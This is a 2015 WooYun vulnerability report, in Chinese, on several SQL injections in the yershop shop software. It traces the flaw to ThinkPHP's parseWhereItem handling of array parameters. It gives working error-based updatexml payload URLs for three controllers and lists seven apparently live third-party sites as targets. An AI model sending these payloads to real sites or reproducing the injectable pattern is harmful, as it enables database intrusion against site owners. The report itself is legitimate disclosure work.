当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0124483

漏洞标题:yershop多用户商城最新版多处SQL注入

相关厂商:yershop.com

漏洞作者: 路人甲

提交时间:2015-07-11 16:52

修复时间:2015-10-13 21:26

公开时间:2015-10-13 21:26

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-11: 细节已通知厂商并且等待厂商处理中
2015-07-15: 厂商已经确认,细节仅向厂商公开
2015-07-18: 细节向第三方安全合作伙伴开放
2015-09-08: 细节向核心白帽子及相关领域专家公开
2015-09-18: 细节向普通白帽子公开
2015-09-28: 细节向实习白帽子公开
2015-10-13: 细节向公众公开

简要描述:

rt

详细说明:

先来五个互联网实例

http://m.meigongfuwu.net//index.php?c=Article&a=index&category[0]==1%20or%20updatexml(1,concat(1,(select%20concat(user(),1,version()))),1)%23in&category[1]=xxxx


http://www.xinyuanzn.com/index.php?c=Article&a=index&category[0]==1%20or%20updatexml(1,concat(1,(select%20concat(user(),1,version()))),1)%23in&category[1]=xxxx


http://crm.onedodo.net/index.php?c=Article&a=index&category[0]==1 or updatexml(1,concat(1,user()),1)%23in&category[1]=xxxx


http://uyshi.com/index.php?c=Article&a=index&category[0]==1 or updatexml(1,concat(1,(select concat(user(),1,version()))),1)#in&category[1]=xxxx


http://hiyatou.com/index.php?c=Article&a=index&category[0]==1 or updatexml(1,concat(1,(select concat(user(),1,version()))),1)#in&category[1]=xxxx


http://test.nylsfw.com/index.php?c=Article&a=index&category[0]==1 or updatexml(1,concat(1,(select concat(user(),1,version()))),1)#in&category[1]=xxxx


http://letai.club/index.php?c=Article&a=index&category[0]==1 or updatexml(1,concat(1,(select concat(user(),1,version()))),1)#in&category[1]=xxxx


看到数据库操作函数

protected function parseWhereItem($key,$val) {
        $whereStr = '';
        if(is_array($val)) {
            if(is_string($val[0])) {
                if(preg_match('/^(EQ|NEQ|GT|EGT|LT|ELT)$/i',$val[0])) { // 比较运算
                    $whereStr .= $key.' '.$this->comparison[strtolower($val[0])].' '.$this->parseValue($val[1]);
                }elseif(preg_match('/^(NOTLIKE|LIKE)$/i',$val[0])){// 模糊查找
                    if(is_array($val[1])) {
                        $likeLogic  =   isset($val[2])?strtoupper($val[2]):'OR';
                        if(in_array($likeLogic,array('AND','OR','XOR'))){
                            $likeStr    =   $this->comparison[strtolower($val[0])];
                            $like       =   array();
                            foreach ($val[1] as $item){
                                $like[] = $key.' '.$likeStr.' '.$this->parseValue($item);
                            }
                            $whereStr .= '('.implode(' '.$likeLogic.' ',$like).')';                          
                        }
                    }else{
                        $whereStr .= $key.' '.$this->comparison[strtolower($val[0])].' '.$this->parseValue($val[1]);
                    }
                }elseif('bind'==strtolower($val[0])){ // 使用表达式
                    $whereStr .= $key.' = :'.$val[1];
                }elseif('exp'==strtolower($val[0])){ // 使用表达式
                    $whereStr .= $key.' '.$val[1];
                }elseif(preg_match('/IN/i',$val[0])){ // IN 运算
                    if(isset($val[2]) && 'exp'==$val[2]) {
                        $whereStr .= $key.' '.strtoupper($val[0]).' '.$val[1];
                    }else{
                        if(is_string($val[1])) {
                             $val[1] =  explode(',',$val[1]);
                        }
                        $zone      =   implode(',',$this->parseValue($val[1]));
                        $whereStr .= $key.' '.strtoupper($val[0]).' ('.$zone.')';
                    }
                }elseif(preg_match('/BETWEEN/i',$val[0])){ // BETWEEN运算
                    $data = is_string($val[1])? explode(',',$val[1]):$val[1];
                    $whereStr .=  $key.' '.strtoupper($val[0]).' '.$this->parseValue($data[0]).' AND '.$this->parseValue($data[1]);
                }else{
                    E(L('_EXPRESS_ERROR_').':'.$val[0]);
                }
            }else {
                $count = count($val);
                $rule  = isset($val[$count-1]) ? (is_array($val[$count-1]) ? strtoupper($val[$count-1][0]) : strtoupper($val[$count-1]) ) : '' ; 
                if(in_array($rule,array('AND','OR','XOR'))) {
                    $count  = $count -1;
                }else{
                    $rule   = 'AND';
                }
                for($i=0;$i<$count;$i++) {
                    $data = is_array($val[$i])?$val[$i][1]:$val[$i];
                    if('exp'==strtolower($val[$i][0])) {
                        $whereStr .= $key.' '.$data.' '.$rule.' ';
                    }else{
                        $whereStr .= $this->parseWhereItem($key,$val[$i]).' '.$rule.' ';
                    }
                }
                $whereStr = '( '.substr($whereStr,0,-4).' )';
            }
        }else {
            //对字符串类型字段采用模糊匹配
            $likeFields   =   $this->config['db_like_fields'];
            if($likeFields && preg_match('/^('.$likeFields.')$/i',$key)) {
                $whereStr .= $key.' LIKE '.$this->parseValue('%'.$val.'%');
            }else {
                $whereStr .= $key.' = '.$this->parseValue($val);
            }
        }
        return $whereStr;
    }


如果我们传入的val中val[0]里面含有in或者between的话,后面就可以插入任意的sql语句
注入#1
看到代码
E:/wamp/www/yershop/ThinkPHP/Library/Think/Db/Driver.class.php

public function index(){
		$cateid= $id ? $id : I('get.category', 0);//获取分类的英文名称
		$category = D('Category')->info($cateid);
		$id=$category['id'];
		
		$cid = D('Category')->getChildrenId($id);
		$map['category_id']=array("in",$cid);
		$map['status']=1;
       //推荐商品
		$pos=M('Document')->where("position!=0")->select();
		$this->assign("poslist",$pos);
		 $key=I('get.order');
		 $sort=I('get.sort');  
       if(isset($key)){
		  
		if($key=="1"){   $listsort="view"." ".$sort;}  
		if($key=="2"){ $listsort="id"." ".$sort;} 
		if($key=="3"){  $listsort="price"." ".$sort;} 
		if($key=="4"){  $listsort="sale"." ".$sort;}  	
		   } 
	if(empty($key)){$key="1";$see="asc";
			$order="view";$sort="asc";
		    $listsort=$order." ".$sort;			
			}
		
    if($sort=="asc"){$see="desc";}
      if($sort=="desc"){$see="asc";}
       $this->assign('see',$see);
      $this->assign('order',$key);
	  $this->assign('value',$sort);
		$count=M('Document')->where($map)->count();
		$Page= new \Think\Page($count,15);
		$Page->setConfig('prev','上一页');
		$Page->setConfig('next','下一页');
		$Page->setConfig('first','第一页');
		$Page->setConfig('last','尾页');
		$Page->setConfig('theme','%FIRST% %UP_PAGE% %LINK_PAGE% %DOWN_PAGE% %END% %HEADER%');
		$show= $Page->show();
		$list= M('Document')->where($map)->order( $listsort)->limit($Page->firstRow.','.$Page->listRows)->select();
		$this->assign('list',$list);// 赋值数据集
		$this->assign('page',$show);//
		//获取分类的id
		$name=$category['name'];
		$child=M('Category')->where("pid='$id'")->select();
		$this->assign('num', $count);
		$this->assign('childlist', $child);
		/* 左侧菜单 */
		$menu=R('index/menulist');
		$this->assign('categoryq', $menu);
		/**
		* 购物车调用
		*/
		$cart=R("shopcart/usercart");
		$this->assign('usercart',$cart);
		if(!session('user_auth')){$usercart=$_SESSION['cart'];
		$this->assign('usercart',$usercart);
		}
		/*栏目页统计代码实现,tag=2*/
		if(1==C('IP_TONGJI')){
		$record=IpLookup("",2,$name);
		}
		/* 底部分类调用*/
		$menulist=R('Service/AllMenu');
		$this->assign('footermenu',$menulist);
		/* 热词调用*/
		$hotsearch=R("Index/getHotsearch");
		$this->assign('hotsearch',$hotsearch);
		/* 分类信息 */
		$category = $this->category();
		//频道页循环3级分类
		$this->meta_title = $category['title'];
		/*销量排行*/
		$sales=$this->ranks();
		$this->assign('sales', $sales);
		/*最近访问*/
		$recent=$this->view_recent();
		$this->assign('recent', $recent);
		/* 模板赋值并渲染模板 */
		$this->assign('category', $category);
		$this->display($category['template_index']);
		}


其中category通过I函数获取,然后进入sql里面。我们可以构造

index.php?c=Article&a=index&category[0]==1 or updatexml(1,concat(1,(select concat(user(),1,version()))),1)%23in&category[1]=xxxx


可以成功出信息
demo测试

QQ截图20150704134334.png


注入#2
Application/Home/Controller/TuanController.class.php

public function category() {
    
	 /* 热词调用*/
    $hotsearch=R("Index/getHotsearch");
    $this->assign('hotsearch',$hotsearch);
    /* 购物车调用*/
   $cart=R("Shopcart/usercart");
   $this->assign('usercart',$cart);
   if(!session('user_auth')){$usercart=$_SESSION['cart'];
        $this->assign('usercart',$usercart);
   
   }
      /* 底部分类调用*/
   $menulist=R('Service/AllMenu');
   $this->assign('footermenu',$menulist);
     /* 左侧分类列表*/
     $mlist=R('Index/menulist');
     $this->assign('categoryq', $mlist);
	  /** * 控制器必须!**/ 
             
		    $tuan=M("tuan");
            $category=$tuan->order("id")->select();//团购分类
            $this->assign('category',$category);// 赋值数据集
			 /* 获取商品*/
	 $pid= $id ? $id : I('get.id', 0);
	 $t=$tuan->find($pid);//团购分类
	 //获取分类的英文名称
       $this->meta_title = '团购_'.$t['title'];
     	 $key=I('get.order');
		 $sort=I('get.sort');  
       if(isset($key)){
		  
		if($key=="1"){   $listsort="view"." ".$sort;}  
		if($key=="2"){ $listsort="goodid"." ".$sort;} 
		if($key=="3"){  $listsort="price"." ".$sort;} 
		if($key=="4"){  $listsort="salenumber"." ".$sort;}  	
		   } 
	if(empty($key)){$key="1";$see="asc";
			$order="view";$sort="asc";
		    $listsort=$order." ".$sort;			
			}
		
    if($sort=="asc"){$see="desc";}
      if($sort=="desc"){$see="asc";}
       $this->assign('see',$see);
      $this->assign('order',$key);
	  $this->assign('value',$sort);
		     
	  $tuan=M("tuan");
      $category=$tuan->order("id")->select();//团购分类
      $this->assign('category',$category);// 赋值数据集
			 /* 获取商品*/
	 $User =M("tuanid"); 
   $map['tuanpid']=I('get.id');;
   $this->assign('id',$pid);// 赋值数据集
	 $User =M("tuanid"); 
      $count=  $User->where($map)->count();
      $Page= new \Think\Page($count,12);
	   $Page->setConfig('prev','上一页');
      $Page->setConfig('next','下一页');
      $Page->setConfig('first','第一页');
      $Page->setConfig('last','尾页');
      $Page->setConfig('theme','%FIRST% %UP_PAGE% %LINK_PAGE% %DOWN_PAGE% %END% %HEADER%');
      $show= $Page->show();    
      $list=$User->where($map)->order($listsort)->limit($Page->firstRow.','.$Page->listRows)->select();
     $this->assign('list',$list);// 赋值数据集
$this->assign('page',$show);// 赋值分页输出 $this->display();
$this->display();


其中id参数可以注入
构造

http://demo.yershop.com/index.php?c=Tuan&a=category&id[0]==1 or updatexml(1,concat(1,(select concat(user(),1,version()))),1)%23in&id[1]=xxx


demo测试

QQ截图20150704134622.png


注入#3
Application/Home/Controller/CenterController.class.php

/***站内信读取***/
public  function msg() {
		
		if(!is_login()){
	$this->error( "您还没有登陆",U("User/login") );	
		}
		/* 购物车调用*/
		$cart=R("shopcart/usercart");
		$this->assign('usercart',$cart);
		if(!session('user_auth'))
		{
		$usercart=$_SESSION['cart'];
		$this->assign('usercart',$usercart);
		}
		/* 底部分类调用*/
		$menulist=R('Service/AllMenu');
		$this->assign('footermenu',$menulist);
		/* 热词调用*/
		$hotsearch=R("Index/getHotsearch");
		$this->assign('hotsearch',$hotsearch);
		$menu=R('index/menulist');
		$this->assign('categoryq', $menu);
		$envelope= M("personenvelope");
		$uid=D("member")->uid();
		$id=I("get.id");
		/* 更新浏览数 */
		$map = array('id' => $id);
		$envelope->where($map)->setInc('view');
		$list=$envelope->find($id);
		$envelope->where($map)->setField("status",2);
		$this->assign("list",$list);
		$this->meta_title = '查看站内信';
		$this->display();
		}


id通过I函数获取可以注入构造

http://demo.yershop.com/index.php?c=Center&a=msg&id[0]==1 or updatexml(1,concat(1,(select concat(user(),1,version()))),1)%23in&id[1]=xxx


demo测试

QQ截图20150704134931.png

漏洞证明:

QQ截图20150704134931.png

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-07-15 21:25

厂商回复:

谢谢

最新状态:

2015-10-08:已修复